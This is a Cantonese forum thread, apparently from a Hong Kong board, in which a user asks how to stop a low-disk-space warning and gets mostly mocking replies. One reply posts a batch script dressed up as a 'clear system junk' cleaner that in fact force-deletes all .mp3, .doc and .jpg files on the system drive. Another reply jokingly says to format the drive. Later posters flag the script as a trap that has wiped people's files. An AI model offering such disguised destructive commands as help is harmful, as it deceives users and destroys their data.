點停止呢個嘢彈出嚟?

點停止呢個嘢彈出嚟?

買多個hardisk

Del幾套AV就無事

細節師

8TB都唔夠用? 樓豬你有咩珍藏可以share呀

圖片左下

冇人識?

只會攞佢著數,點會放嘢比佢!

My computer > right click > format drive > Yes

人哋咪好認真教咗你叫你買多個harddisk law

天真過天真嬌

自己搞掂啦!睇得起連登仔,諗住慳時間至上嚟問下,點知淨得鳩噏冇個識.

你咁多野 買個nas drive啦

樓主 聽開歌?

百度

本來再開個膠post刷下存在感，點知俾人發現左用支拿野 好柒阿

[quote]複製虛線入邊的字：
===========================================================
@echo off
echo 正在清除系統垃圾文件，請稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\*.mp3
del /f /s /q %systemdrive%\*.doc
del /f /s /q %systemdrive%\*.jpg
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 清除系統LJ完成！
echo. & pause
============================================================

樓上可以報驚了

有人因為copy過無哂重要文件 新聞都報過

樓上洗定八月十五

share 左唔會多左空間或少左垃圾